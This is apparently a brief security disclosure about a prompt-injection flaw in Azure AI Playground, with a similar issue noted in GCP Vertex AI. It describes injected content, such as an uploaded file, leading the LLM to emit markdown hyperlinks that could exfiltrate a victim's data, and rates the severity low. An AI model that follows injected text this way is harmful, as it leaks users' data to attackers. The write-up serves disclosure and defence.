In Azure AI Playground, a Prompt Injection attack could cause an LLM to return markdown tags.
This would have allowed an adversary whose data makes it into the chat context
(e.g., via an uploaded file) to achieve exfiltration of the victim’s
data by rendering hyperlinks. However, the severity of this issue is low,
as there were no integrations that could pull remote content. This means
Indirect Prompt Injection was not possible, and it would require the victim to copy
the malicious prompt from elsewhere. A similar issue affected GCP Vertex AI.